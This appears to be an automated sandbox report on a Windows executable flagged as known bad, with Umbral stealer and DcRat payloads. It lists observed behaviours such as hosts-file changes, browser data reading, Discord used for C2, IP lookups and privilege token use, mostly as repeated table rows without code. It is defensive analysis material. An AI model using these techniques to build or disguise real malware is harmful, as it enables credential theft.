Analysis Overview
SHA256
862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06
Threat Level: Known bad
The file 862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
DcRat
DCRat payload
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Unsigned PE
Enumerates physical storage devices
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Modifies registry class
Detects videocard installed
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-28 04:50
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-28 04:50
Reported
2024-06-28 04:52
Platform
win10v2004-20240508-en
Max time kernel
90s
Max time network
150s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\SolaraB.exe | N/A |
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dIIhost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
